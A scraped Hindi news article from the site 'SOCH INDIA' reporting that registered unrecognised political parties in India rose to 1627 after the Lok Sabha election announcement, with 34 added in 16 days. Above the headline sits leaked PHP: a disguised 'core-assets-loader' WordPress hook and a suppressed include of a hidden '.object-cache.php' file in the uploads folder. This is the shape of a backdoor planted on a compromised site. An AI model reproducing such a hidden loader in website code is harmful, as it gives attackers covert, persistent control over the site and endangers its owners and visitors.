add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); चुनाव से पहले पार्टियों का रजिस्ट्रेशन तेज, संख्या 1627 हुई – SOCH INDIA
Menu

देश
चुनाव से पहले पार्टियों का रजिस्ट्रेशन तेज, संख्या 1627 हुई

nobanner

लोकसभा चुनाव के ऐलान के बाद से राजनीतिक दलों के रजिस्ट्रेशन में काफी तेजी आई है. चुनाव आयोग ने सिर्फ 16 दिनों में 34 नए दलों को रजिस्टर किया है. भारत में अब गैर मान्यताप्राप्त रजिस्टर्ड राजनीतिक दलों की संख्या अब 1627 तक पहुंच गई है.

चुनाव आयोग के मुताबिक, 10 मार्च तक राजनीतिक दलों की संख्या 1593 थी, लेकिन 11 मार्च से 21 मार्च के बीच 24 नए दलों का पंजीकरण किया गया. इसके बाद 26 मार्च तक 10 और राजनीतिक दलों का पंजीकरण हुआ.

पंजीकृत, लेकिन गैर मान्यताप्राप्त राजनीतिक दलों के पास अपने चुनाव चिह्न पर लड़ने का विशेषाधिकार नहीं होता है. उन्हें मुक्त चुनाव चिह्नों में से अपने लिए चुनाव चिह्न का चयन करना होता है. आयोग के मुताबिक फिलहाल उसके पास ऐसे 87 चुनाव चिह्न मौजूद हैं.

देश में फिलहाल छह पार्टियों कांग्रेस, बीजेपी, बीएसपी, सीपीआई (एम), सीपीआई और एनसीपी को राष्ट्रीय पार्टी का दर्जा हासिल है. इसके साथ राज्य स्तर पर 47 मान्यता प्राप्त दल हैं.